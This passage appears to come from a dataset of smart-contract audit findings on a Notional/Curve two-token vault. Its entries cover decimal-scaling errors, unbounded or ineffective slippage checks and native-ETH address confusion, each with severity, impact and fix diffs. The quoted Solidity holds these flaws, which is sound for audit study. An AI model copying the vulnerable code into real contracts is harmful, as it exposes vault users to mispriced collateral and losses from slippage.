`50 DAI` denominated in WEI will be `50 * 10^18` since the decimals of DAI are 18.\\nNext, the code logic attempts to value the secondary balance (50 DAI) in terms of the primary token (USDC) using the oracle price (1 * 10^18).\\n```\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = 50 DAI * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^18) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^18\\n```\\n\\n50 DAI should be worth 50 USDC (50 * 10^6). However, the `secondaryAmountInPrimary` shows that it is worth 50,000,000,000,000 USDC (50 * 10^18).\\n```\\nprimaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\nprimaryAmount = [(50 * 10^6) + (50 * 10^18)] * 10^6 / 10^18\\nprimaryAmount = [(50 * 10^6) + (50 * 10^18)] / 10^12\\nprimaryAmount = 50,000,000.00005 = 50 million\\n```\\n\\n50 LP Pool tokens should be worth 100 USDC. However, the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function shows that it is worth 50 million USDC, which overvalues the LP Pool tokens.\\nIn summary, if a leverage vault has two tokens with different decimals:\\nIf primary token's decimals (e.g. 18) > secondary token's decimals (e.g. 6), then `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function will undervalue the LP Pool tokens\\nIf primary token's decimals (e.g. 6) < secondary token's decimals (e.g. 18), then `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function will overvalue the LP Pool tokensчWhen valuing the secondary balance in terms of the primary token using the oracle price, the result should be scaled up or down the decimals of the primary token accordingly if the decimals of the two tokens are different.\\nThe root cause of this issue is in the following portion of the code, which attempts to add the `primaryBalance` and `secondaryAmountInPrimary` before multiplying with the `primaryPrecision`. 
The `primaryBalance` and `secondaryAmountInPrimary` might not be denominated in the same decimals. Therefore, they cannot be added together without scaling them if the decimals of two tokens are different.\\n```\\nprimaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\n```\\n\\nConsider implementing the following changes to ensure that the math within the `_getTimeWeightedPrimaryBalance` function work with tokens with different decimals. The below approach will scale the secondary token to match the primary token's precision before performing further computation.\\n```\\nfunction _getTimeWeightedPrimaryBalance(\\n TwoTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n uint256 poolClaim,\\n uint256 oraclePrice,\\n uint256 spotPrice\\n) internal view returns (uint256 primaryAmount) {\\n // Make sure spot price is within oracleDeviationLimit of pairPrice\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n \\n // Get shares of primary and secondary balances with the provided poolClaim\\n uint256 totalSupply = poolContext.poolToken.totalSupply();\\n uint256 primaryBalance = poolContext.primaryBalance * poolClaim / totalSupply;\\n uint256 secondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply;\\n\\n// Add the line below\\n // Scale secondary balance to primaryPrecision\\n// Add the line below\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n// Add the line below\\n uint256 secondaryPrecision = 10 ** poolContext.secondaryDecimals;\\n// Add the line below\\n secondaryBalance = secondaryBalance * primaryPrecision / secondaryPrecision\\n \\n // Value the secondary balance in terms of the primary token using the oraclePairPrice\\n uint256 secondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\n \\n// Remove the line below\\n // Make sure primaryAmount is reported in primaryPrecision\\n// Remove 
the line below\\n    uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n// Remove the line below\\n    primaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\n// Add the line below\\n primaryAmount = primaryBalance + secondaryAmountInPrimary\\n}\\n```\\n\\nThe `poolContext.primaryBalance` or `poolClaim` are not scaled up to `strategyContext.poolClaimPrecision`. Thus, the `primaryBalance` is not scaled in any form. Thus, I do not see the need to perform any conversion at the last line of the `_getTimeWeightedPrimaryBalance` function.\\n```\\nuint256 primaryBalance = poolContext.primaryBalance * poolClaim / totalSupply;\\n```\\n\\nThe following attempts to run through the examples in the previous section showing that the updated function produces valid results after the changes.\\nIf primary token's decimals (e.g. 18) > secondary token's decimals (e.g. 6)\\n```\\nPrimary Balance = 50 DAI (18 Deci), Secondary Balance = 50 USDC (6 Deci)\\n\\nsecondaryBalance = secondaryBalance * primaryPrecision / secondaryPrecision\\nsecondaryBalance = 50 USDC * 10^18 / 10^6\\nsecondaryBalance = (50 * 10^6) * 10^18 / 10^6 = (50 * 10^18)\\n\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = (50 * 10^18) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^18) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^18\\n\\nprimaryAmount = primaryBalance + secondaryAmountInPrimary\\nprimaryAmount = (50 * 10^18) + (50 * 10^18) = (100 * 10^18) = 100 DAI\\n```\\n\\nIf primary token's decimals (e.g. 6) < secondary token's decimals (e.g. 
18)\\n```\\nPrimary Balance = 50 USDC (6 Deci), Secondary Balance = 50 DAI (18 Deci)\\n\\nsecondaryBalance = secondaryBalance * primaryPrecision / secondaryPrecision\\nsecondaryBalance = 50 DAI * 10^6 / 10^18\\nsecondaryBalance = (50 * 10^18) * 10^6 / 10^18 = (50 * 10^6)\\n\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^6\\n\\nprimaryAmount = primaryBalance + secondaryAmountInPrimary\\nprimaryAmount = (50 * 10^6) + (50 * 10^6) = (100 * 10^6) = 100 USDC\\n```\\n\\nIf primary token's decimals (e.g. 6) == secondary token's decimals (e.g. 6)\\n```\\nPrimary Balance = 50 USDC (6 Deci), Secondary Balance = 50 USDT (6 Deci)\\n\\nsecondaryBalance = secondaryBalance * primaryPrecision / secondaryPrecision\\nsecondaryBalance = 50 USDT * 10^6 / 10^6\\nsecondaryBalance = (50 * 10^6) * 10^6 / 10^6 = (50 * 10^6)\\n\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^6\\n\\nprimaryAmount = primaryBalance + secondaryAmountInPrimary\\nprimaryAmount = (50 * 10^6) + (50 * 10^6) = (100 * 10^6) = 100 USDC\\n```\\n\\n`strategyContext.poolClaimPrecision` set to `CurveConstants.CURVE_PRECISION`, which is `1e18`. `oraclePrice` is always in `1e18` precision.чA vault supporting tokens with two different decimals will undervalue or overvalue the LP Pool tokens.\\nThe affected `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function is called within the `Curve2TokenPoolUtils._convertStrategyToUnderlying` function that is used for valuing strategy tokens in terms of the primary balance. 
As a result, the strategy tokens will be overvalued or undervalued\\nFollowing are some of the impacts of this issue:\\nIf the strategy tokens are overvalued or undervalued, the users might be liquidated prematurely or be able to borrow more than they are allowed to since the `Curve2TokenPoolUtils._convertStrategyToUnderlying` function is indirectly used for computing the collateral ratio of an account within Notional's `VaultConfiguration.calculateCollateralRatio` function.\\n`expectedUnderlyingRedeemed` is computed based on the `Curve2TokenPoolUtils._convertStrategyToUnderlying` function. If the `expectedUnderlyingRedeemed` is incorrect, it will break the vault settlement process.ч```\\nFile: TwoTokenPoolUtils.sol\\n function _getTimeWeightedPrimaryBalance(\\n TwoTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n uint256 poolClaim,\\n uint256 oraclePrice,\\n uint256 spotPrice\\n ) internal view returns (uint256 primaryAmount) {\\n // Make sure spot price is within oracleDeviationLimit of pairPrice\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n \\n // Get shares of primary and secondary balances with the provided poolClaim\\n uint256 totalSupply = poolContext.poolToken.totalSupply();\\n uint256 primaryBalance = poolContext.primaryBalance * poolClaim / totalSupply;\\n uint256 secondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply;\\n\\n // Value the secondary balance in terms of the primary token using the oraclePairPrice\\n uint256 secondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\n\\n // Make sure primaryAmount is reported in primaryPrecision\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n primaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\n }\\n```\\n -`oracleSlippagePercentOrLimit` can exceed the `Constants.SLIPPAGE_LIMIT_PRECISION`чmediumчTrade might be settled 
with a large slippage causing a loss of assets as the `oracleSlippagePercentOrLimit` limit is not bounded and can exceed the `Constants.SLIPPAGE_LIMIT_PRECISION` threshold.\\nThe code at Line 73-75 only checks if the `oracleSlippagePercentOrLimit` is within the `Constants.SLIPPAGE_LIMIT_PRECISION` if `useDynamicSlippage` is `true`. If the trade is performed without dynamic slippage, the trade can be executed with an arbitrary limit.\\n```\\nFile: StrategyUtils.sol\\n function _executeTradeExactIn(\\n TradeParams memory params,\\n ITradingModule tradingModule,\\n address sellToken,\\n address buyToken,\\n uint256 amount,\\n bool useDynamicSlippage\\n ) internal returns (uint256 amountSold, uint256 amountBought) {\\n require(\\n params.tradeType == TradeType.EXACT_IN_SINGLE || params.tradeType == TradeType.EXACT_IN_BATCH\\n );\\n if (useDynamicSlippage) {\\n require(params.oracleSlippagePercentOrLimit <= Constants.SLIPPAGE_LIMIT_PRECISION);\\n }\\n\\n // Sell residual secondary balance\\n Trade memory trade = Trade(\\n params.tradeType,\\n sellToken,\\n buyToken,\\n amount,\\n useDynamicSlippage ? 
0 : params.oracleSlippagePercentOrLimit,\\n block.timestamp, // deadline\\n params.exchangeData\\n );\\n```\\n\\nThe `StrategyUtils._executeTradeExactIn` function is utilized by the Curve Vault.чConsider restricting the slippage limit when a trade is executed without dynamic slippage.\\n```\\n function _executeTradeExactIn(\\n TradeParams memory params,\\n ITradingModule tradingModule,\\n address sellToken,\\n address buyToken,\\n uint256 amount,\\n bool useDynamicSlippage\\n ) internal returns (uint256 amountSold, uint256 amountBought) {\\n require(\\n params.tradeType == TradeType.EXACT_IN_SINGLE || params.tradeType == TradeType.EXACT_IN_BATCH\\n );\\n if (useDynamicSlippage) {\\n require(params.oracleSlippagePercentOrLimit <= Constants.SLIPPAGE_LIMIT_PRECISION);\\n// Remove the line below\\n }\\n// Add the line below\\n } else {\\n// Add the line below\\n require(params.oracleSlippagePercentOrLimit != 0 && params.oracleSlippagePercentOrLimit <= Constants.SLIPPAGE_LIMIT_PRECISION_FOR_NON_DYNAMIC_TRADE);\\n// Add the line below\\n } \\n```\\nчTrade might be settled with a large slippage causing a loss of assets.ч```\\nFile: StrategyUtils.sol\\n function _executeTradeExactIn(\\n TradeParams memory params,\\n ITradingModule tradingModule,\\n address sellToken,\\n address buyToken,\\n uint256 amount,\\n bool useDynamicSlippage\\n ) internal returns (uint256 amountSold, uint256 amountBought) {\\n require(\\n params.tradeType == TradeType.EXACT_IN_SINGLE || params.tradeType == TradeType.EXACT_IN_BATCH\\n );\\n if (useDynamicSlippage) {\\n require(params.oracleSlippagePercentOrLimit <= Constants.SLIPPAGE_LIMIT_PRECISION);\\n }\\n\\n // Sell residual secondary balance\\n Trade memory trade = Trade(\\n params.tradeType,\\n sellToken,\\n buyToken,\\n amount,\\n useDynamicSlippage ? 
0 : params.oracleSlippagePercentOrLimit,\\n block.timestamp, // deadline\\n params.exchangeData\\n );\\n```\\n -Oracle slippage rate is used for checking primary and secondary ratioчmediumчThe oracle slippage rate (oraclePriceDeviationLimitPercent) is used for checking the ratio of the primary and secondary tokens to be deposited into the pool.\\nAs a result, changing the `oraclePriceDeviationLimitPercent` setting to increase or decrease the allowable slippage between the spot and oracle prices can cause unexpected side-effects to the `_checkPrimarySecondaryRatio` function, which might break the `reinvestReward` function that relies on the `_checkPrimarySecondaryRatio` function under certain condition.\\nThe `_checkPriceLimit` function is for the purpose of comparing the spot price with the oracle price. Thus, the slippage (oraclePriceDeviationLimitPercent) is specially selected for this purpose.\\n```\\nFile: StrategyUtils.sol\\n function _checkPriceLimit(\\n StrategyContext memory strategyContext,\\n uint256 oraclePrice,\\n uint256 poolPrice\\n ) internal pure {\\n uint256 lowerLimit = (oraclePrice * \\n (VaultConstants.VAULT_PERCENT_BASIS - strategyContext.vaultSettings.oraclePriceDeviationLimitPercent)) / \\n VaultConstants.VAULT_PERCENT_BASIS;\\n uint256 upperLimit = (oraclePrice * \\n (VaultConstants.VAULT_PERCENT_BASIS + strategyContext.vaultSettings.oraclePriceDeviationLimitPercent)) / \\n VaultConstants.VAULT_PERCENT_BASIS;\\n\\n if (poolPrice < lowerLimit || upperLimit < poolPrice) {\\n revert Errors.InvalidPrice(oraclePrice, poolPrice);\\n }\\n }\\n```\\n\\nHowever, it was observed that `_checkPriceLimit` function is repurposed for checking if the ratio of the primary and secondary tokens to be deposited to the pool is more or less proportional to the pool's balances within the `_checkPrimarySecondaryRatio` function during reinvestment.\\nThe `oraclePriceDeviationLimitPercent` setting should not be used here as it does not involve any oracle data. 
Thus, the correct way is to define another setting specifically for checking if the ratio of the primary and secondary tokens to be deposited to the pool is more or less proportional to the pool's balances.\\n```\\nFile: Curve2TokenPoolUtils.sol\\n function _checkPrimarySecondaryRatio(\\n StrategyContext memory strategyContext,\\n uint256 primaryAmount, \\n uint256 secondaryAmount, \\n uint256 primaryPoolBalance, \\n uint256 secondaryPoolBalance\\n ) private pure {\\n uint256 totalAmount = primaryAmount + secondaryAmount;\\n uint256 totalPoolBalance = primaryPoolBalance + secondaryPoolBalance;\\n\\n uint256 primaryPercentage = primaryAmount * CurveConstants.CURVE_PRECISION / totalAmount; \\n uint256 expectedPrimaryPercentage = primaryPoolBalance * CurveConstants.CURVE_PRECISION / totalPoolBalance;\\n\\n strategyContext._checkPriceLimit(expectedPrimaryPercentage, primaryPercentage);\\n\\n uint256 secondaryPercentage = secondaryAmount * CurveConstants.CURVE_PRECISION / totalAmount;\\n uint256 expectedSecondaryPercentage = secondaryPoolBalance * CurveConstants.CURVE_PRECISION / totalPoolBalance;\\n\\n strategyContext._checkPriceLimit(expectedSecondaryPercentage, secondaryPercentage);\\n }\\n```\\nчThere is a difference between the slippage for the following two items:\\nAllowable slippage between the spot price and oracle price\\nAllowable slippage between the ratio of the primary and secondary tokens to be deposited to the pool against the pool's balances\\nSince they serve a different purposes, they should not share the same slippage. 
Consider defining a separate slippage setting and function for checking if the ratio of the primary and secondary tokens deposited to the pool is more or less proportional to the pool's balances.чChanging the `oraclePriceDeviationLimitPercent` setting to increase or decrease the allowable slippage between the spot price and oracle price can cause unexpected side-effects to the `_checkPrimarySecondaryRatio` function, which might break the `reinvestReward` function that relies on the `_checkPrimarySecondaryRatio` function under certain condition.\\nAdditionally, the value chosen for the `oraclePriceDeviationLimitPercent` is to compare the spot price with the oracle price. Thus, it might not be the optimal value for checking if the ratio of the primary and secondary tokens deposited to the pool is more or less proportional to the pool's balances.ч```\\nFile: StrategyUtils.sol\\n function _checkPriceLimit(\\n StrategyContext memory strategyContext,\\n uint256 oraclePrice,\\n uint256 poolPrice\\n ) internal pure {\\n uint256 lowerLimit = (oraclePrice * \\n (VaultConstants.VAULT_PERCENT_BASIS - strategyContext.vaultSettings.oraclePriceDeviationLimitPercent)) / \\n VaultConstants.VAULT_PERCENT_BASIS;\\n uint256 upperLimit = (oraclePrice * \\n (VaultConstants.VAULT_PERCENT_BASIS + strategyContext.vaultSettings.oraclePriceDeviationLimitPercent)) / \\n VaultConstants.VAULT_PERCENT_BASIS;\\n\\n if (poolPrice < lowerLimit || upperLimit < poolPrice) {\\n revert Errors.InvalidPrice(oraclePrice, poolPrice);\\n }\\n }\\n```\\n -Logic Error due to different representation of Native ETH (0x0 & 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE)чmediumчUnexpected results might occur during vault initialization if either of the pool's tokens is a Native ETH due to the confusion between `Deployments.ETH_ADDRESS (address(0))` and `Deployments.ALT_ETH_ADDRESS (0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE)`.\\nThe `PRIMARY_TOKEN` or `SECONDARY_TOKEN` is explicitly converted to 
`Deployments.ETH_ADDRESS (address(0)` during deployment.\\n```\\nFile: Curve2TokenPoolMixin.sol\\nabstract contract Curve2TokenPoolMixin is CurvePoolMixin {\\n..SNIP..\\n constructor(\\n NotionalProxy notional_,\\n ConvexVaultDeploymentParams memory params\\n ) CurvePoolMixin(notional_, params) {\\n address primaryToken = _getNotionalUnderlyingToken(params.baseParams.primaryBorrowCurrencyId);\\n\\n PRIMARY_TOKEN = primaryToken;\\n\\n // Curve uses ALT_ETH_ADDRESS\\n if (primaryToken == Deployments.ETH_ADDRESS) {\\n primaryToken = Deployments.ALT_ETH_ADDRESS;\\n }\\n\\n address token0 = CURVE_POOL.coins(0);\\n address token1 = CURVE_POOL.coins(1);\\n \\n uint8 primaryIndex;\\n address secondaryToken;\\n if (token0 == primaryToken) {\\n primaryIndex = 0;\\n secondaryToken = token1;\\n } else {\\n primaryIndex = 1;\\n secondaryToken = token0;\\n }\\n\\n if (secondaryToken == Deployments.ALT_ETH_ADDRESS) {\\n secondaryToken = Deployments.ETH_ADDRESS;\\n }\\n\\n PRIMARY_INDEX = primaryIndex;\\n SECONDARY_TOKEN = secondaryToken;\\n```\\n\\nIt was observed that there is a logic error within the `Curve2TokenConvexVault.initialize` function. Based on Lines 56 and 59 within the `Curve2TokenConvexVault.initialize` function, it assumes that if either the primary or secondary token is ETH, then the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` will be set to `Deployments.ALT_ETH_ADDRESS`, which point to `0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE`.\\nHowever, this is incorrect as the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` has already been converted to `Deployments.ETH_ADDRESS (address(0))` during deployment. 
Refer to the constructor of `Curve2TokenPoolMixin`.\\nThus, the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` will never be equal to `Deployments.ALT_ETH_ADDRESS`, and the condition at Lines 56 and 59 will always evaluate to True.\\n```\\nFile: Curve2TokenConvexVault.sol\\ncontract Curve2TokenConvexVault is Curve2TokenVaultMixin {\\n..SNIP..\\n    function initialize(InitParams calldata params)\\n        external\\n        initializer\\n        onlyNotionalOwner\\n    {\\n        __INIT_VAULT(params.name, params.borrowCurrencyId);\\n        CurveVaultStorage.setStrategyVaultSettings(params.settings);\\n\\n        if (PRIMARY_TOKEN != Deployments.ALT_ETH_ADDRESS) {\\n            IERC20(PRIMARY_TOKEN).checkApprove(address(CURVE_POOL), type(uint256).max);\\n        }\\n        if (SECONDARY_TOKEN != Deployments.ALT_ETH_ADDRESS) {\\n            IERC20(SECONDARY_TOKEN).checkApprove(address(CURVE_POOL), type(uint256).max);\\n        }\\n\\n        CURVE_POOL_TOKEN.checkApprove(address(CONVEX_BOOSTER), type(uint256).max);\\n    }\\n```\\n\\nAs a result, if the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` is `Deployments.ETH_ADDRESS (address(0))`, the code will go ahead to call the `checkApprove` function, which might cause unexpected results during vault initialization.чIf the `PRIMARY_TOKEN` or `SECONDARY_TOKEN` is equal to `Deployments.ALT_ETH_ADDRESS` or `Deployments.ETH_ADDRESS`, this means that it points to native ETH and the `checkApprove` can be safely skipped.\\n```\\nfunction initialize(InitParams calldata params)\\n    external\\n    initializer\\n    onlyNotionalOwner\\n{\\n    __INIT_VAULT(params.name, params.borrowCurrencyId);\\n    CurveVaultStorage.setStrategyVaultSettings(params.settings);\\n\\n// Remove the line below\\n    if (PRIMARY_TOKEN != Deployments.ALT_ETH_ADDRESS) {\\n// Add the line below\\n    if (PRIMARY_TOKEN != Deployments.ALT_ETH_ADDRESS && PRIMARY_TOKEN != Deployments.ETH_ADDRESS) {\\n        IERC20(PRIMARY_TOKEN).checkApprove(address(CURVE_POOL), type(uint256).max);\\n    }\\n// Remove the line below\\n    if (SECONDARY_TOKEN != Deployments.ALT_ETH_ADDRESS) {\\n// Add the line below\\n 
if (SECONDARY_TOKEN != Deployments.ALT_ETH_ADDRESS && SECONDARY_TOKEN != Deployments.ETH_ADDRESS) {\\n        IERC20(SECONDARY_TOKEN).checkApprove(address(CURVE_POOL), type(uint256).max);\\n    }\\n\\n    CURVE_POOL_TOKEN.checkApprove(address(CONVEX_BOOSTER), type(uint256).max);\\n}\\n```\\nчUnexpected results during vault initialization if either of the pool's tokens is a Native ETH.ч```\\nFile: Curve2TokenPoolMixin.sol\\nabstract contract Curve2TokenPoolMixin is CurvePoolMixin {\\n..SNIP..\\n    constructor(\\n        NotionalProxy notional_,\\n        ConvexVaultDeploymentParams memory params\\n    ) CurvePoolMixin(notional_, params) {\\n        address primaryToken = _getNotionalUnderlyingToken(params.baseParams.primaryBorrowCurrencyId);\\n\\n        PRIMARY_TOKEN = primaryToken;\\n\\n        // Curve uses ALT_ETH_ADDRESS\\n        if (primaryToken == Deployments.ETH_ADDRESS) {\\n            primaryToken = Deployments.ALT_ETH_ADDRESS;\\n        }\\n\\n        address token0 = CURVE_POOL.coins(0);\\n        address token1 = CURVE_POOL.coins(1);\\n        \\n        uint8 primaryIndex;\\n        address secondaryToken;\\n        if (token0 == primaryToken) {\\n            primaryIndex = 0;\\n            secondaryToken = token1;\\n        } else {\\n            primaryIndex = 1;\\n            secondaryToken = token0;\\n        }\\n\\n        if (secondaryToken == Deployments.ALT_ETH_ADDRESS) {\\n            secondaryToken = Deployments.ETH_ADDRESS;\\n        }\\n\\n        PRIMARY_INDEX = primaryIndex;\\n        SECONDARY_TOKEN = secondaryToken;\\n```\\n -Ineffective slippage mechanism when redeeming proportionallyчhighчA trade will continue to be executed regardless of how bad the slippage is since the minimum amount returned by the `TwoTokenPoolUtils._getMinExitAmounts` function does not work effectively. 
Thus, a trade might incur significant slippage, resulting in the vault receiving fewer tokens in return, leading to losses for the vault shareholders.\\nThe `params.minPrimary` and `params.minSecondary` are calculated automatically based on the share of the Curve pool with a small discount within the `Curve2TokenConvexHelper._executeSettlement` function (Refer to Line 124 below)\\n```\\nFile: Curve2TokenConvexHelper.sol\\n function _executeSettlement(\\n StrategyContext calldata strategyContext,\\n Curve2TokenPoolContext calldata poolContext,\\n uint256 maturity,\\n uint256 poolClaimToSettle,\\n uint256 redeemStrategyTokenAmount,\\n RedeemParams memory params\\n ) private {\\n (uint256 spotPrice, uint256 oraclePrice) = poolContext._getSpotPriceAndOraclePrice(strategyContext);\\n\\n /// @notice params.minPrimary and params.minSecondary are not required to be passed in by the caller\\n /// for this strategy vault\\n (params.minPrimary, params.minSecondary) = poolContext.basePool._getMinExitAmounts({\\n strategyContext: strategyContext,\\n oraclePrice: oraclePrice,\\n spotPrice: spotPrice,\\n poolClaim: poolClaimToSettle\\n });\\n```\\n\\n```\\nFile: TwoTokenPoolUtils.sol\\n /// @notice calculates the expected primary and secondary amounts based on\\n /// the given spot price and oracle price\\n function _getMinExitAmounts(\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext calldata strategyContext,\\n uint256 spotPrice,\\n uint256 oraclePrice,\\n uint256 poolClaim\\n ) internal view returns (uint256 minPrimary, uint256 minSecondary) {\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n\\n // min amounts are calculated based on the share of the Balancer pool with a small discount applied\\n uint256 totalPoolSupply = poolContext.poolToken.totalSupply();\\n minPrimary = (poolContext.primaryBalance * poolClaim * \\n strategyContext.vaultSettings.poolSlippageLimitPercent) / // @audit-info poolSlippageLimitPercent = 9975, # 0.25%\\n 
(totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS)); // @audit-info VAULT_PERCENT_BASIS = 1e4 = 10000\\n minSecondary = (poolContext.secondaryBalance * poolClaim * \\n strategyContext.vaultSettings.poolSlippageLimitPercent) / \\n (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS));\\n }\\n```\\n\\nWhen LP tokens are redeemed proportionally via the Curve Pool's `remove_liquidity` function, the tokens received are based on the share of the Curve pool as the source code.\\n```\\n@external\\n@nonreentrant('lock')\\ndef remove_liquidity(\\n _amount: uint256,\\n _min_amounts: uint256[N_COINS],\\n) -> uint256[N_COINS]:\\n \"\"\"\\n @notice Withdraw coins from the pool\\n @dev Withdrawal amounts are based on current deposit ratios\\n @param _amount Quantity of LP tokens to burn in the withdrawal\\n @param _min_amounts Minimum amounts of underlying coins to receive\\n @return List of amounts of coins that were withdrawn\\n \"\"\"\\n amounts: uint256[N_COINS] = self._balances()\\n lp_token: address = self.lp_token\\n total_supply: uint256 = ERC20(lp_token).totalSupply()\\n CurveToken(lp_token).burnFrom(msg.sender, _amount) # dev: insufficient funds\\n\\n for i in range(N_COINS):\\n value: uint256 = amounts[i] * _amount / total_supply\\n assert value >= _min_amounts[i], \"Withdrawal resulted in fewer coins than expected\"\\n\\n amounts[i] = value\\n if i == 0:\\n raw_call(msg.sender, b\"\", value=value)\\n else:\\n assert ERC20(self.coins[1]).transfer(msg.sender, value)\\n\\n log RemoveLiquidity(msg.sender, amounts, empty(uint256[N_COINS]), total_supply - _amount)\\n\\n return amounts\\n```\\n\\nAssume a Curve Pool with the following state:\\nConsists of 200 US Dollars worth of tokens (100 DAI and 100 USDC). 
DAI is the primary token\\nDAI <> USDC price is 1:1\\nTotal Supply = 100 LP Pool Tokens\\nAssume that 50 LP Pool Tokens will be claimed during vault settlement.\\n`TwoTokenPoolUtils._getMinExitAmounts` function will return `49.875 DAI` as `params.minPrimary` and `49.875 USDC` as `params.minSecondary` based on the following calculation\\n```\\nminPrimary = (poolContext.primaryBalance * poolClaim * strategyContext.vaultSettings.poolSlippageLimitPercent) / (totalPoolSupply * uint256(VaultConstants.VAULT_PERCENT_BASIS))\\nminPrimary = (100 DAI * 50 LP_TOKEN * 99.75%) / (100 LP_TOKEN * 100%)\\n\\nRewrite for clarity (ignoring rounding error):\\nminPrimary = 100 DAI * (50 LP_TOKEN/100 LP_TOKEN) * (99.75%/100%) = 49.875 DAI\\n\\nminSecondary = same calculation = 49.875 USDC\\n```\\n\\nCurve Pool's `remove_liquidity` function will return `50 DAI` and `50 USDC` if 50 LP Pool Tokens are redeemed.\\nNote that `TwoTokenPoolUtils._getMinExitAmounts` function performs the calculation based on the spot balance of the pool similar to the approach of the Curve Pool's `remove_liquidity` function. However, the `TwoTokenPoolUtils._getMinExitAmounts` function applied a discount to the returned result, while the Curve Pool's `remove_liquidity` function did not.\\nAs such, the number of tokens returned by Curve Pool's `remove_liquidity` function will always be larger than the number of tokens returned by the `TwoTokenPoolUtils._getMinExitAmounts` function regardless of the on-chain economic condition or the pool state (e.g. imbalance). 
Thus, the minimum amounts (minAmounts) pass into the Curve Pool's `remove_liquidity` function will never be triggered under any circumstance.\\n```\\na = Curve Pool's remove_liquidity => x DAI\\nb = TwoTokenPoolUtils._getMinExitAmounts => (x DAI - 0.25% discount)\\na > b => true (for all instances)\\n```\\n\\nThus, the `TwoTokenPoolUtils._getMinExitAmounts` function is not effective in determining the slippage when redeeming proportionally.чWhen redeeming proportional, theTwoTokenPoolUtils._getMinExitAmounts function can be removed. Instead, give the caller the flexibility to define the slippage/minimum amount (params.minPrimary and params.minSecondary). To prevent the caller from setting a slippage that is too large, consider restricting the slippage to an acceptable range.\\nThe proper way of computing the minimum amount of tokens to receive from a proportional trade (remove_liquidity) is to call the Curve's Pool `calc_token_amount` function off-chain and reduce the values returned by the allowed slippage amount.\\nNote that `calc_token_amount` cannot be used solely on-chain for computing the minimum amount because the result can be manipulated because it uses spot balances for computation.\\nSidenote: Removing `TwoTokenPoolUtils._getMinExitAmounts` function also removes the built-in spot price and oracle price validation. Thus, the caller must remember to define the slippage. Otherwise, the vault settlement will risk being sandwiched. Alternatively, shift the `strategyContext._checkPriceLimit(oraclePrice, spotPrice)` code outside the `TwoTokenPoolUtils._getMinExitAmounts` function.чA trade will always be executed even if it returns fewer than expected assets since the minimum amount returned by the `TwoTokenPoolUtils._getMinExitAmounts` function does not work effectively. 
Thus, a trade might incur unexpected slippage, resulting in the vault receiving fewer tokens in return, leading to losses for the vault shareholders.ч```\\nFile: Curve2TokenConvexHelper.sol\\n function _executeSettlement(\\n StrategyContext calldata strategyContext,\\n Curve2TokenPoolContext calldata poolContext,\\n uint256 maturity,\\n uint256 poolClaimToSettle,\\n uint256 redeemStrategyTokenAmount,\\n RedeemParams memory params\\n ) private {\\n (uint256 spotPrice, uint256 oraclePrice) = poolContext._getSpotPriceAndOraclePrice(strategyContext);\\n\\n /// @notice params.minPrimary and params.minSecondary are not required to be passed in by the caller\\n /// for this strategy vault\\n (params.minPrimary, params.minSecondary) = poolContext.basePool._getMinExitAmounts({\\n strategyContext: strategyContext,\\n oraclePrice: oraclePrice,\\n spotPrice: spotPrice,\\n poolClaim: poolClaimToSettle\\n });\\n```\\n -Users are forced to use the first pool returned by the Curve RegistryчmediumчIf multiple pools support the exchange, users are forced to use the first pool returned by the Curve Registry. The first pool returned by Curve Registry might not be the most optimal pool to trade with. 
